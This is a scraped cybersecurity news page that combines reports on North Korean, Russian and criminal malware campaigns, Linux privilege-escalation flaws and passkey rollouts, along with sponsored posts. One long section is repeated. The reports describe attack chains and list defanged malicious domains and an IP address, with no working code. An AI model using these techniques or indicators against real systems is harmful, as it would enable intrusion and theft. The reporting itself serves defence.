Category: Cybersecurity

The North Korea-aligned threat actor known as BlueNoroff has been observed targeting an employee in the Web3 sector with deceptive Zoom calls featuring deepfaked company executives to trick them into installing malware on their Apple macOS devices.

Huntress, which revealed details of the cyber intrusion, said the attack targeted an unnamed cryptocurrency foundation employee, who received a message from an external contact on Telegram.

“The message requested time to speak to the employee, and the attacker sent a Calendly link to set up meeting time,” security researchers Alden Schmidt, Stuart Ashenbrenner, and Jonathan Semon said. “The Calendly link was for a Google Meet event, but when clicked, the URL redirects the end user to a fake Zoom domain controlled by the threat actor.”

After several weeks, the employee is said to have joined a group Zoom meeting that included several deepfakes of known members of the senior leadership of their company, along with other external contacts.

However, when the employee said they were unable to use their microphone, the synthetic personas urged them to download and install a Zoom extension to address the supposed issue. The link to the extension, shared via Telegram, downloaded an AppleScript that went by the name “zoom_sdk_support.scpt.”

This AppleScript first opens a legitimate webpage for the Zoom software development kit (SDK), but is also configured to stealthily download a next-stage payload from a remote server (“support[.]us05web-zoom[.]biz”) and executes a shell script.

The script begins by disabling bash history logging and then checks if Rosetta 2 is installed on the compromised Mac, and if not, installs it. Rosetta is a software that enables Macs running Apple silicon to run apps that were built for a Mac with an Intel processor (x86_64).

The script then proceeds to create a hidden file called “.pwd,” and downloads a binary from the malicious Zoom web page (“web071zoom[.lus/fix/audio-fv/7217417464”) to the “/tmp/icloud_helper” directory. It also performs another request to “web071zoom[.]us/fix/audio-tr/7217417464” to fetch another unspecified payload.

The shell script also prompts the user to provide their system password and wipes the history of executed commands to avoid leaving a forensic trail. Huntress said its investigation led to the discovery of eight distinct malicious binaries on the victim host –

• Telegram 2, a Nim-based binary responsible for starting the primary backdoor
• Root Troy V4, a fully-featured Go backdoor that’s used to run remote AppleScript payloads, shell commands, and download additional malware and execute them
• InjectWithDyld, a C++ binary loader downloaded by Root Troy V4, which, in turn, drops two more payloads: A benign Swift application to facilitate process injection and a different Nim implant that enables the operator to issue commands and receive responses asynchronously
• XScreen, an Objective-C keylogger with features to monitor the victim’s keystrokes, clipboard, and the screen, and send the information to a command-and-control (C2) server
• CryptoBot, a Go-based information stealer that can collect cryptocurrency related files from the host
• NetChk, an almost empty binary that’s designed to generate random numbers forever

BlueNoroff, also tracked under the names Alluring Pisces, APT38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima, and TA444, is a sub-cluster within the Lazarus Group that has a history of striking financial institutions, cryptocurrency businesses, and ATMs for monetary gain and generate revenue for the Democratic People’s Republic of Korea (DPRK).

The group is best known for orchestrating a series of cryptocurrency heists known as TraderTraitor to target employees of organizations engaged in blockchain research with malicious cryptocurrency trading applications. Some of the significant cases include the hacks of Bybit in February 2025 and Axie Infinity in March 2022.

“Remote workers, especially in high-risk areas of work, are often the ideal targets for groups like TA444,” Huntress said. “It is important to train employees to identify common attacks that start off with social engineering related to remote meeting software.”

According to DTEX’s latest assessment of North Korea’s cyber structure, the APT38 mission likely no longer exists and has fractured into TraderTraitor (aka Jade Sleet and UNC4899) and CryptoCore (aka CageyChameleon, CryptoMimic, DangerousPassword, LeeryTurtle, and Sapphire Sleet), with the new clusters becoming the new faces of financial theft for the regime.

“TraderTraitor is arguably the most prolific of any of the DPRK APT groups when it comes to cryptocurrency theft and seems to have housed the most talent from the original APT38 effort,” DTEX said. “CryptoCore has been active since at least 2018, likely splitting out of APT38 with TraderTraitor.”

What’s more, the use of audio issue-themed lures to trick prospective victims into compromising their own machines with malware has its echoes in an evolution of another North Korea-linked campaign dubbed Contagious Interview, which involves using ClickFix-style alerts to deliver another malware named GolangGhost.

The new iteration, referred to as ClickFake Interview, revolves around creating fake job advertisements and duping job applicants into copying and running a malicious command under the pretext of addressing an issue with access camera and microphone on a fake website set up by the threat actors to complete their hiring assessment.

These cross-platform attacks, per Cisco Talos, have since evolved further, employing a Python version of GolangGhost that has been codenamed PylangGhost. The bogus assessment sites impersonate well-known financial entities such as Archblock, Coinbase, Robinhood, and Uniswap, and have been found to target a small set of users mainly located in India.

“In recent campaigns, the threat actor Famous Chollima — potentially made up of multiple groups — has been using a Python-based version of their trojan to target Windows systems, while continuing to deploy a Golang-based version for MacOS users,” security researcher Vanja Svajcer said. “Linux users are not targeted in these latest campaigns.”

PylangGhost, like its Golang counterpart, establishes contact with a C2 server to receive commands that enable the attackers to remotely control the infected machine, download/upload files, as well as steal cookies and credentials from over 80 browser extensions, including password managers and cryptocurrency wallets.

“It is not clear […] why the threat actors decided to create two variants using a different programming language, or which was created first,” Talos remarked. “The structure, the naming conventions and the function names are very similar, which indicates that the developers of the different versions either worked closely together or are the same person.”

Jun 19, 2025The Hacker NewsCybersecurity / Threat Hunting

Most cyberattacks today don’t start with loud alarms or broken firewalls. They start quietly—inside tools and websites your business already trusts.

It’s called “Living Off Trusted Sites” (LOTS)—and it’s the new favorite strategy of modern attackers. Instead of breaking in, they blend in.

Hackers are using well-known platforms like Google, Microsoft, Dropbox, and Slack as launchpads. They hide malicious code inside routine traffic, making it incredibly difficult for traditional defenses to detect them.

And here’s the scary part: many security teams don’t even realize it’s happening—until it’s too late.

Why You’re Not Seeing These Attacks

LOTS tactics don’t look suspicious at first glance. There’s no malware signature to flag, and no unusual IP address to trace. It’s legitimate traffic—until it’s not.

Attackers are exploiting:

• Common business tools like Teams, Zoom, and GitHub
• Shortened or vanity URLs to redirect users
• Trusted cloud services to host malicious payloads

In short, they’re using your trust against you.

What You’ll Learn in This Free Webinar

Join Zscaler’s top threat hunters for “Threat Hunting Insights from the World’s Largest Security Cloud“—a must-attend webinar revealing how stealthy LOTS attacks are detected and stopped in real time. Get frontline tactics to outsmart threats hiding in trusted tools.

You’ll discover:

• 🔍 The latest LOTS attack techniques seen in real environments
• 🛠️ How threat hunters caught stealthy attackers hiding inside “normal” traffic
• 🚨 What trusted tools are being misused right now by threat actors
• 🔐 Simple, proven ways to improve LOTS detection and reduce risk
• 🔭 What’s coming next: trends shaping the future of stealth-based attacks

This session is for anyone responsible for defending their organization—whether you’re a security leader trying to stay ahead of evolving threats, a threat hunter sharpening your detection skills, or part of an IT or SOC team overwhelmed by false positives and stealthy attacks. If your company relies on SaaS apps, cloud platforms, or collaborative tools, you’re already a target—and LOTS tactics are designed to slip past unnoticed.

Watch this Webinar

Attackers today aren’t trying to break in—they’re blending in. By hiding inside trusted tools and platforms, they bypass traditional defenses and operate in plain sight. This webinar gives you rare access to real-world detection stories and techniques from experts who analyze trillions of security signals every day inside the world’s largest inline security cloud.

Reserve your seat now to gain exclusive frontline insights, proven tactics, and smarter strategies that could save your team hours—and stop attacks before they succeed.

Jun 19, 2025Ravie LakshmananEmail Security / Identity Protection

Threat actors with suspected ties to Russia have been observed taking advantage of a Google account feature called application specific passwords (or app passwords) as part of a novel social engineering tactic designed to gain access to victims’ emails.

Details of the highly targeted campaign were disclosed by Google Threat Intelligence Group (GTIG) and the Citizen Lab, stating the activity seeks to impersonate the U.S. Department of State.

“From at least April through early June 2025, this actor targeted prominent academics and critics of Russia, often using extensive rapport building and tailored lures to convince the target to set up application specific passwords (ASPs), GTIG researchers Gabby Roncone and Wesley Shields said.

“Once the target shares the ASP passcode, the attackers establish persistent access to the victim’s mailbox.”

The activity has been attributed by Google to a threat cluster it tracks as UNC6293, which it says is likely affiliated with the Russian state-sponsored hacking group called APT29 (aka BlueBravo, Cloaked Ursa, CozyLarch, Cozy Bear, ICECAP, Midnight Blizzard, and The Dukes).

The social engineering unfolds over a span of several weeks to establish rapport with targets, rather than induce a sense of pressure or urgency that may have otherwise raised suspicion.

This involves sending benign phishing emails disguised as meeting invitations that include no less than four different fictitious addresses with the “@state.gov” email address in the CC line to lend it a veneer of credibility.

“A target might reason ‘if this isn’t legitimate, surely one of these State Department employees would say something, especially if I reply and keep them on the CC line,’” the Citizen Lab said.

“We believe that the attacker is aware that the State Department’s email server is apparently configured to accept all messages and does not emit a ‘bounce’ response even when the address does not exist.”

This indicates that these attacks are meticulously planned and executed to trick victims into parting with a 16-digit passcode that gives the adversary permission to access their mailbox under the pretext of enabling “secure communications between internal employees and external partners.”

Google describes these app passwords as a way for a less secure app or device the ability to access a user’s Google account that has two-factor authentication (2FA) enabled.

“When you use 2-Step Verification, some less secure apps or devices may be blocked from accessing your Google account,” per the company. “App passwords are a way to let the blocked app or device access your Google account.”

The initial messages are designed to elicit a response from the target to set up a meeting, after which they are sent a PDF document that lists a series of steps to create an app password in order to securely access a fake Department of State cloud environment and share the code with them.

“The attackers then set up a mail client to use the ASP, likely with the end goal of accessing and reading the victim’s email correspondence,” GTIG said. “This method also allows the attackers to have persistent access to accounts.”

Google said it observed a second campaign bearing Ukrainian themes, and that the attackers logged into victim accounts mainly using residential proxies and VPS servers to evade detection. The company said it has since taken steps to secure the accounts compromised by the campaigns.

UNC6293’s ties to APT29 stem from a series of similar social engineering attacks that have leveraged novel techniques like device code phishing and device join phishing to gain unauthorized access to Microsoft 365 accounts since the start of the year.

Device join phishing is particularly noteworthy for the fact that it tricks victims into sending back to the attackers a Microsoft-generated OAuth code to hijack their accounts.

“Since April 2025, Microsoft has observed suspected Russian-linked threat actors using third-party application messages or emails referencing upcoming meeting invitations to deliver a malicious link containing valid authorization code,” Microsoft revealed last month.

“When clicked, the link returns a token for the Device Registration Service, allowing registration of the threat actor’s device to the tenant.”

Jun 19, 2025Ravie LakshmananMobile Security / Passwordless

Meta Platforms on Wednesday announced that it’s adding support for passkeys, the next-generation password standard, on Facebook.

“Passkeys are a new way to verify your identity and login to your account that’s easier and more secure than traditional passwords,” the tech giant said in a post.

Support for passkeys is expected to be available “soon” on Android and iOS mobile devices. The feature is also coming to its Messenger platform in the coming months.

The company said passkeys can also be used to auto-fill payment information when making purchases using Meta Pay.

Meta previously rolled out passkeys support for WhatsApp on Android in October 2023, and on iOS a few months later in April 2024. There is no word yet on when it plans to bring passkeys to Instagram.

Passkeys, backed by the FIDO Alliance, is a passwordless authentication solution that allows users to securely sign in to online services by using biometrics or the device lock PIN code.

“Passkeys are an upgrade in security compared to traditional passwords and one-time SMS codes because they are resistant to guessing or theft by malicious websites or scam links, making them effective against phishing and password spraying attacks,” Meta said.

Last month, Microsoft made passkeys the default sign-in method for new consumer accounts. More recently, Apple previewed upcoming changes to its Passwords app that allows users to import and export passkeys between participating credential manager apps across iOS, iPadOS, macOS, and visionOS 26.

Jun 19, 2025Ravie LakshmananLinux / Vulnerability

Cybersecurity researchers have uncovered two local privilege escalation (LPE) flaws that could be exploited to gain root privileges on machines running major Linux distributions.

The vulnerabilities, discovered by Qualys, are listed below –

• CVE-2025-6018 – LPE from unprivileged to allow_active in SUSE 15’s Pluggable Authentication Modules (PAM)
• CVE-2025-6019 – LPE from allow_active to root in libblockdev via the udisks daemon

“These modern ‘local-to-root’ exploits have collapsed the gap between an ordinary logged-in user and a full system takeover,” Saeed Abbasi, Senior Manager at Qualys Threat Research Unit (TRU), said.

“By chaining legitimate services such as udisks loop-mounts and PAM/environment quirks, attackers who own any active GUI or SSH session can vault across polkit’s allow_active trust zone and emerge as root in seconds.”

The cybersecurity company said CVE-2025-6018 is present in the PAM configuration of openSUSE Leap 15 and SUSE Linux Enterprise 15, enabling an unprivileged local attacker to elevate to the “allow_active” user and call Polkit actions that are otherwise reserved for a physically present user.

CVE-2025-6019, on the other hand, affects libblockdev and is exploitable via the udisks daemon included by default on most Linux distributions. It essentially permits an “allow_active” user to gain full root privileges by chaining it with CVE-2025-6018.

“Although it nominally requires ‘allow_active’ privileges, udisks ships by default on almost all Linux distributions, so nearly any system is vulnerable,” Abbasi added. “Techniques to gain ‘allow_active,’ including the PAM issue disclosed here, further negate that barrier.”

Once root privileges are obtained, an attacker has carte blanche access to the system, allowing them use it as a springboard for broader post-compromise actions, such as altering security controls and implanting backdoors for covert access.

Qualys said it has developed proof-of-concept (PoC) exploits to confirm the presence of these vulnerabilities on various operating systems, including Ubuntu, Debian, Fedora, and openSUSE Leap 15.

To mitigate the risk posed by these flaws, it’s essential to apply patches provided by the Linux distribution vendors. As temporary workarounds, users can modify the Polkit rule for “org.freedesktop.udisks2.modify-device” to require administrator authentication (“auth_admin”).

Flaw Disclosed in Linux PAM

The disclosure comes as maintainers of Linux PAM resolved a high-severity path traversal flaw (CVE-2025-6020, CVSS score: 7.8) that could also allow a local user to escalate to root privileges. The issue has been fixed in version 1.7.1.

“The module pam_namespace in linux-pam <= 1.7.0 may access user-controlled paths without proper protections, which allows a local user to elevate their privileges to root via multiple symlink attacks and race conditions,” Linux PAM maintainer Dmitry V. Levin said.

Linux systems are vulnerable if they use pam_namespace to set up polyinstantiated directories for which the path to either the polyinstantiated directory or instance directory is under user-control. As workarounds for CVE-2025-6020, users can disable pam_namespace or ensure it does not operate on user-controlled paths.

ANSSI’s Olivier Bal-Petre, who reported the flaw to the maintainer on January 29, 2025, said users should also update their namespace.init script if they do not use the one provided by their distribution to ensure that the either of two paths are safe to operate on as root.

A new campaign is making use of Cloudflare Tunnel subdomains to host malicious payloads and deliver them via malicious attachments embedded in phishing emails.

The ongoing campaign has been codenamed SERPENTINE#CLOUD by Securonix.

It leverages “the Cloudflare Tunnel infrastructure and Python-based loaders to deliver memory-injected payloads through a chain of shortcut files and obfuscated scripts,” security researcher Tim Peck said in a report shared with The Hacker News.

The attack starts with sending payment- or invoice-themed phishing emails bearing a link to a zipped document that contains a Windows shortcut (LNK) file. These shortcuts are disguised as documents to trick victims into opening them, effectively activating the infection sequence.

The elaborate multi-step process culminates in the execution of a Python-based shellcode loader that executes payloads packed with the open-source Donut loader entirely in memory.

Securonix said the campaign has targeted the United States, United Kingdom, Germany, and other regions across Europe and Asia. The identity of the threat actor(s) behind the campaign is presently unknown, although the cybersecurity company pointed out their English fluency.

The threat activity cluster is also notable for its shifting initial access methods, pivoting from internet shortcut (URL) files to using LNK shortcut files masquerading as PDF documents. These payloads are then used to retrieve additional stages over WebDAV via the Cloudflare Tunnel subdomains.

It’s worth noting that a variation of this campaign was previously documented by eSentire and Proofpoint last year, with the attacks paving the way for AsyncRAT, GuLoader, PureLogs Stealer, Remcos RAT, Venom RAT, and XWorm.

The abuse of TryCloudflare offers manifold advantages. For starters, malicious actors have long made it harder to detect by using legitimate cloud service providers as a front for their operations, including payload delivery and command-and-control (C2) communication.

By using a reputable subdomain (“*.trycloudflare[.]com”) for nefarious ends, it makes it exceedingly tough for defenders to distinguish between harmful and benign activities, thereby allowing it to evade URL or domain-based blocking mechanisms.

The initial infection occurs when the LNK files are launched, causing it to download a next-stage payload, a Windows Script File (WSF), from a remote WebDAV share hosted on a Cloudflare Tunnel subdomain. The WSF file is subsequently executed using cscript.exe in a manner without arousing the victim’s suspicion.

“This WSF file functions as a lightweight VBScript-based loader, designed to execute an external batch file from a second Cloudflare domain,” Peck said. “The ‘kiki.bat’ file serves as the main payload delivery script next in the series of stagers. Overall, it’s designed for stealth and persistence.”

The primary responsibility of the batch script is to display a decoy PDF document, check for antivirus software, and download and execute Python payloads, which are then used to run Donut-packed payloads like AsyncRAT or Revenge RAT in memory.

“Attackers distributed spear-phishing emails impersonating trusted institutions in Colombia, delivering SVG decoys with embedded links to JS / VBS stagers hosted on public platforms, or password-protected ZIP files containing the payloads directly,” Acronis researchers Santiago Pontiroli, Jozsef Gegeny, and Ilia Dafchev said.

The attacks led to the deployment of remote access trojans like AsyncRAT and Remcos RAT, with recent campaigns also utilizing a .NET loader associated with Katz Stealer. These attack chains involve hiding the payloads within Base64-encoded text of image files hosted on the Internet Archive.

A noteworthy aspect of the campaign is the use of SVG smuggling techniques to deliver malicious ZIP archives using SVG files. These payloads are hosted on file-sharing services such as Bitbucket, Dropbox, Discord, and YDRAY. The download archives contain both legitimate executables and malicious DLLs, the latter of which are sideloaded to ultimately serve the trojans.

“A natural evolution from its earlier SVG smuggling techniques, this threat actor has adopted a modular, memory-resident loader that can execute payloads dynamically and entirely in memory, leaving minimal traces behind,” the researchers said.

“The presence of Portuguese-language strings and method parameters within the loader mirrors TTPs commonly observed in Brazilian banking malware, suggesting potential code reuse, shared development resources or even cross-regional actor collaboration.”

ClickFix Surge Propels Drive-By Compromises

The findings also coincide with a rise in social engineering attacks that employ the ClickFix tactic to deploy stealers and remote access trojans like Lumma Stealer and SectopRAT under the guise of fixing an issue or completing a CAPTCHA verification.

According to statistics shared by ReliaQuest, drive-by compromises accounted for 23% of all phishing-based tactics observed between March and May 2025. “Techniques like ClickFix were central to drive-by downloads,” the cybersecurity company said.

ClickFix is effective primarily because it deceives targets into carrying out seemingly harmless, everyday actions that are unlikely to raise any red flags, because they’re so used to seeing CAPTCHA screening pages and other notifications. What makes it compelling is that it gets users to do the main work of infecting their own machines instead of having to resort to more sophisticated methods like exploiting software flaws.

“External remote resources dropped from third to fourth place as attackers increasingly exploit user mistakes rather than technical vulnerabilities,” ReliaQuest said. “This shift is likely driven by the simplicity, success rate, and universal applicability of social engineering campaigns like ClickFix.”

A new multi-stage malware campaign is targeting Minecraft users with a Java-based malware that employs a distribution-as-service (DaaS) offering called Stargazers Ghost Network.

“The campaigns resulted in a multi-stage attack chain targeting Minecraft users specifically,” Check Point researchers Jaromír Hořejší and Antonis Terefos said in a report shared with The Hacker News.

“The malware was impersonating Oringo and Taunahi, which are ‘Scripts and macros tools’ (aka cheats). Both the first and second stages are developed in Java and can only be executed if the Minecraft runtime is installed on the host machine.”

The end goal of the attack is to trick players into downloading a Minecraft mod from GitHub and deliver a .NET information stealer with comprehensive data theft capabilities. The campaign was first detected by the cybersecurity company in March 2025.

What makes the activity notable is its use of an illicit offering called the Stargazers Ghost Network, which makes use of thousands of GitHub accounts to set up tainted repositories that masquerade as cracked software and game cheats.

These malicious repositories, masquerading as Minecraft mods, serve as a conduit for infecting users of the popular video game with a Java loader (e.g., “Oringo-1.8.9.jar”) that remains undetected by all antivirus engines as of writing.

The Java archive (JAR) files implement simple anti-VM and anti-analysis techniques to sidestep detection efforts. Their main objective is to download and run another JAR file, a second-stage stealer that fetches and executes a .NET stealer as the final payload when the game is started by the victim.

The second-stage component is retrieved from an IP address (“147.45.79.104”) that’s stored in Base64-encoded format Pastebin, essentially turning the paste tool into a dead drop resolver.

“To add mods to a Minecraft game, the user must copy the malicious JAR archive into the Minecraft mods folder. After starting the game, the Minecraft process will load all mods from the folder, including the malicious mod, which will download and execute the second stage,” the researchers said.

Besides downloading the .NET stealer, the second-stage stealer is equipped to steal Discord and Minecraft tokens, as well as Telegram-related data. The .NET stealer, on the other hand, is capable of harvesting credentials from various web browsers and gathering files, and information from cryptocurrency wallets and other apps like Steam, and FileZilla.

It can also take screenshots and amass information related to running processes, the system’s external IP address, and clipboard contents. The captured information is eventually bundled and transmitted back to the attacker via a Discord webhook.

The campaign is suspected to be the work of a Russian-speaking threat actor owing to the presence of several artifacts written in the Russian language and the timezone of the attacker’s commits (UTC+03:00). It’s estimated that more than 1,500 devices may have fallen prey to the scheme.

“This case highlights how popular gaming communities can be exploited as effective vectors for malware distribution, emphasizing the importance of caution when downloading third-party content,” the researchers said.

“The Stargazers Ghost Network has been actively distributing this malware, targeting Minecraft players seeking mods to enhance their gameplay. What appeared to be harmless downloads were, in fact, Java-based loaders that deployed two additional stealers, capable of exfiltrating credentials and other sensitive data.”

New Variants of KimJongRAT Stealer Detected

The development comes as Palo Alto Networks Unit 42 detailed two new variants of an information stealer codenamed KimJongRAT that’s likely connected to the same North Korean threat actor behind BabyShark and Stolen Pencil. KimJongRAT has been detected in the wild as far back as May 2013, delivered as a secondary payload in BabyShark attacks.

“One of the new variants uses a Portable Executable (PE) file and the other uses a PowerShell implementation,” security researcher Dominik Reichel said. “The PE and PowerShell variants are both initiated by clicking a Windows shortcut (LNK) file that downloads a dropper file from an attacker-controlled content delivery network (CDN) account.”

While the PE variant’s dropper deploys a loader, a decoy PDF and a text file, the dropper in the PowerShell variant deploys a decoy PDF file along with a ZIP archive. The loader, in turn, downloads auxiliary payloads, including the stealer component for KimJongRAT.

The ZIP archive delivered by the PowerShell variant’s dropper contains scripts that embed the KimJongRAT PowerShell-based stealer and keylogger components.

Both the new incarnations are capable of gathering and transferring victim information, files matching specific extensions, and browser data, such as credentials and details from cryptocurrency wallet extensions. The PE variant of KimJongRAT is also designed to harvest FTP and email client information.

“The continued development and deployment of KimJongRAT, featuring changing techniques such as using a legitimate CDN server to disguise its distribution, demonstrates a clear and ongoing threat,” Unit 42 said. “This adaptability not only showcases the persistent threat posed by such malware but also underscores its developers’ commitment to updating and expanding its capabilities.”

Cybersecurity researchers have exposed a previously unknown threat actor known as Water Curse that relies on weaponized GitHub repositories to deliver multi-stage malware.

“The malware enables data exfiltration (including credentials, browser data, and session tokens), remote access, and long-term persistence on infected systems,” Trend Micro researchers Jovit Samaniego, Aira Marcelo, Mohamed Fahmy, and Gabriel Nicoleta said in an analysis published this week.

The “broad and sustained” campaign, first spotted last month, set up repositories offering seemingly innocuous penetration testing utilities, but harbored within their Visual Studio project configuration files malicious payloads such as SMTP email bomber and Sakura-RAT.

Water Curse’s arsenal incorporates a wide range of tools and programming languages, underscoring their cross-functional development capabilities to target the supply chain with “developer-oriented information stealers that blur the line between red team tooling and active malware distribution.”

“Upon execution, the malicious payloads initiated complex multistage infection chains utilizing obfuscated scripts written in Visual Basic Script (VBS) and PowerShell,” the researchers said. “These scripts downloaded encrypted archives, extracted Electron-based applications, and performed extensive system reconnaissance.”

The attacks are also characterized by the use of anti-debugging techniques, privilege escalation methods, and persistence mechanisms to maintain a long-term foothold on the affected hosts. Also employed are PowerShell scripts to weaken host defenses and inhibit system recovery.

Water Curse has been described as a financially motivated threat actor that’s driven by credential theft, session hijacking, and resale of illicit access. As many as 76 GitHub accounts have been linked to the campaign. There is evidence to suggest related activity may have been ongoing all the way back to March 2023.

The emergence of Water Curse is the latest example of how threat actors are abusing the trust associated with legitimate platforms like GitHub as a delivery channel for malware and stage software supply chain attacks.

“Their repositories include malware, evasion utilities, game cheats, aimbots, cryptocurrency wallet tools, OSINT scrapers, spamming bots, and credential stealers,” Trend Micro said. “This reflects a multi-vertical targeting strategy that blends cybercrime with opportunistic monetization.”

“Their infrastructure and behavior indicate a focus on stealth, automation, and scalability, with active exfiltration via Telegram and public file-sharing services.”

The disclosure comes as multiple campaigns have been observed leveraging the prevalent ClickFix strategy to deploy various malware families such as AsyncRAT, DeerStealer (via a loader named Hijack Loader), Filch Stealer, LightPerlGirl, and SectopRAT (also via Hijack Loader).

AsyncRAT is one of the many readily available remote access trojans (RATs) that has been put to use by unidentified threat actors to indiscriminately target thousands of organizations spanning multiple sectors since early 2024. Some aspects of the campaign were documented by Forcepoint in August 2024 and January 2025.

“This tradecraft allows the malware to bypass traditional perimeter defenses, particularly by using Cloudflare’s temporary tunnels to serve payloads from seemingly legitimate infrastructure,” Halcyon said. “These tunnels provide attackers with ephemeral and unregistered subdomains that appear trustworthy to perimeter controls, making it difficult to pre-block or blacklist.”

“Because the infrastructure is spun up dynamically via legitimate services, defenders face challenges in distinguishing malicious use from authorized DevOps or IT maintenance workflows. This tactic enables threat actors to deliver payloads without relying on compromised servers or bulletproof hosting, increasing both the scale and stealth of the campaign.”

The findings also follow the discovery of an ongoing malicious campaign that has targeted various European organizations located in Spain, Portugal, Italy, France, Belgium, and the Netherlands with invoice-themed phishing lures to deliver a named Sorillus RAT (aka Ratty RAT).

Previous campaigns distributing the malware have singled out accounting and tax professionals using income tax return decoys, some of which have leveraged HTML smuggling techniques to conceal the malicious payloads.

The attack chain detailed by Orange Cyberdefense employs similar phishing emails that aim to trick recipients into opening PDF attachments containing a OneDrive link that points to a PDF file directly hosted on the cloud storage service while prompting the user to click an “Open the document” button.

Doing so redirects the victim to a malicious web server that acts as a traffic distribution system (TDS) to evaluate the incoming request and determine whether they need to proceed further to the next stage of the infection. If the victim’s machine meets the necessary criteria, they are displayed a benign PDF while a JAR file is stealthily downloaded to drop and execute Sorillus RAT.

A Java-based RAT that first surfaced in 2019, Sorillus is a cross-platform malware that can harvest sensitive information, download/upload files, take screenshots, record audio, log keystrokes, run arbitrary commands, and even uninstall itself. It also doesn’t help that numerous racked versions of the trojan are available online.

The attacks are assessed to be part of a broader campaign that has been observed delivering SambaSpy to users in Italy. SambaSpy, per Orange Cyberdefense, belongs to the Sorillus malware family.

“The operation showcases a strategic blend of legitimate services – such as OneDrive, MediaFire, and tunneling platforms like Ngrok and LocaltoNet – to evade detection,” the cybersecurity company said. “The repeated use of Brazilian Portuguese in payloads supports a likely attribution to Brazilian-speaking threat actors.”

Cybersecurity researchers have exposed a previously unknown threat actor known as Water Curse that relies on weaponized GitHub repositories to deliver multi-stage malware.

“The malware enables data exfiltration (including credentials, browser data, and session tokens), remote access, and long-term persistence on infected systems,” Trend Micro researchers Jovit Samaniego, Aira Marcelo, Mohamed Fahmy, and Gabriel Nicoleta said in an analysis published this week.

The “broad and sustained” campaign, first spotted last month, set up repositories offering seemingly innocuous penetration testing utilities, but harbored within their Visual Studio project configuration files malicious payloads such as SMTP email bomber and Sakura-RAT.

Water Curse’s arsenal incorporates a wide range of tools and programming languages, underscoring their cross-functional development capabilities to target the supply chain with “developer-oriented information stealers that blur the line between red team tooling and active malware distribution.”

“Upon execution, the malicious payloads initiated complex multistage infection chains utilizing obfuscated scripts written in Visual Basic Script (VBS) and PowerShell,” the researchers said. “These scripts downloaded encrypted archives, extracted Electron-based applications, and performed extensive system reconnaissance.”

The attacks are also characterized by the use of anti-debugging techniques, privilege escalation methods, and persistence mechanisms to maintain a long-term foothold on the affected hosts. Also employed are PowerShell scripts to weaken host defenses and inhibit system recovery.

Water Curse has been described as a financially motivated threat actor that’s driven by credential theft, session hijacking, and resale of illicit access. As many as 76 GitHub accounts have been linked to the campaign. There is evidence to suggest related activity may have been ongoing all the way back to March 2023.

The emergence of Water Curse is the latest example of how threat actors are abusing the trust associated with legitimate platforms like GitHub as a delivery channel for malware and stage software supply chain attacks.

“Their repositories include malware, evasion utilities, game cheats, aimbots, cryptocurrency wallet tools, OSINT scrapers, spamming bots, and credential stealers,” Trend Micro said. “This reflects a multi-vertical targeting strategy that blends cybercrime with opportunistic monetization.”

“Their infrastructure and behavior indicate a focus on stealth, automation, and scalability, with active exfiltration via Telegram and public file-sharing services.”

The disclosure comes as multiple campaigns have been observed leveraging the prevalent ClickFix strategy to deploy various malware families such as AsyncRAT, DeerStealer (via a loader named Hijack Loader), Filch Stealer, LightPerlGirl, and SectopRAT (also via Hijack Loader).

AsyncRAT is one of the many readily available remote access trojans (RATs) that has been put to use by unidentified threat actors to indiscriminately target thousands of organizations spanning multiple sectors since early 2024. Some aspects of the campaign were documented by Forcepoint in August 2024 and January 2025.

“This tradecraft allows the malware to bypass traditional perimeter defenses, particularly by using Cloudflare’s temporary tunnels to serve payloads from seemingly legitimate infrastructure,” Halcyon said. “These tunnels provide attackers with ephemeral and unregistered subdomains that appear trustworthy to perimeter controls, making it difficult to pre-block or blacklist.”

“Because the infrastructure is spun up dynamically via legitimate services, defenders face challenges in distinguishing malicious use from authorized DevOps or IT maintenance workflows. This tactic enables threat actors to deliver payloads without relying on compromised servers or bulletproof hosting, increasing both the scale and stealth of the campaign.”

The findings also follow the discovery of an ongoing malicious campaign that has targeted various European organizations located in Spain, Portugal, Italy, France, Belgium, and the Netherlands with invoice-themed phishing lures to deliver a named Sorillus RAT (aka Ratty RAT).

Previous campaigns distributing the malware have singled out accounting and tax professionals using income tax return decoys, some of which have leveraged HTML smuggling techniques to conceal the malicious payloads.

The attack chain detailed by Orange Cyberdefense employs similar phishing emails that aim to trick recipients into opening PDF attachments containing a OneDrive link that points to a PDF file directly hosted on the cloud storage service while prompting the user to click an “Open the document” button.

Doing so redirects the victim to a malicious web server that acts as a traffic distribution system (TDS) to evaluate the incoming request and determine whether they need to proceed further to the next stage of the infection. If the victim’s machine meets the necessary criteria, they are displayed a benign PDF while a JAR file is stealthily downloaded to drop and execute Sorillus RAT.

A Java-based RAT that first surfaced in 2019, Sorillus is a cross-platform malware that can harvest sensitive information, download/upload files, take screenshots, record audio, log keystrokes, run arbitrary commands, and even uninstall itself. It also doesn’t help that numerous racked versions of the trojan are available online.

The attacks are assessed to be part of a broader campaign that has been observed delivering SambaSpy to users in Italy. SambaSpy, per Orange Cyberdefense, belongs to the Sorillus malware family.

“The operation showcases a strategic blend of legitimate services – such as OneDrive, MediaFire, and tunneling platforms like Ngrok and LocaltoNet – to evade detection,” the cybersecurity company said. “The repeated use of Brazilian Portuguese in payloads supports a likely attribution to Brazilian-speaking threat actors.”

Jun 18, 2025The Hacker NewsDevSecOps / Security Architecture

For organizations eyeing the federal market, FedRAMP can feel like a gated fortress. With strict compliance requirements and a notoriously long runway, many companies assume the path to authorization is reserved for the well-resourced enterprise. But that’s changing.

In this post, we break down how fast-moving startups can realistically achieve FedRAMP Moderate authorization without derailing product velocity, drawing from real-world lessons, technical insights, and the bruises earned along the way from a cybersecurity startup that just went through the process.

Why It Matters

Winning in the federal space starts with trust—and that trust begins with FedRAMP. But pursuing authorization is not a simple compliance checkbox. It’s a company-wide shift that requires intentional strategy, deep security investment, and a willingness to move differently than most startups.

Let’s get into what that actually looks like.

Keys to a Successful FedRAMP Authorization

1. Align to NIST 800-53 from Day One

Startups that bolt on compliance late in the game usually end up rewriting their infrastructure to fit. The better path? Build directly against the NIST 800-53 Rev. 5 Moderate baseline as your internal security framework—even before FedRAMP is on the roadmap.

This early commitment reduces rework, accelerates ATO prep, and fosters a security-first mindset that scales. Additionally, compliance is often a must have for organizations to do business with mid to large enterprises so it’s more than a checkbox, it’s a business enabler. Here at Beyond Identity, when we say “secure-by-design” platform, a foundational component is alignment to strict compliance frameworks from the start.

2. Build an Integrated Security Team

FedRAMP isn’t just an InfoSec problem—it’s a team sport. Success requires tight integration across:

• Compliance-focused InfoSec leads who understand the nuances of FedRAMP controls
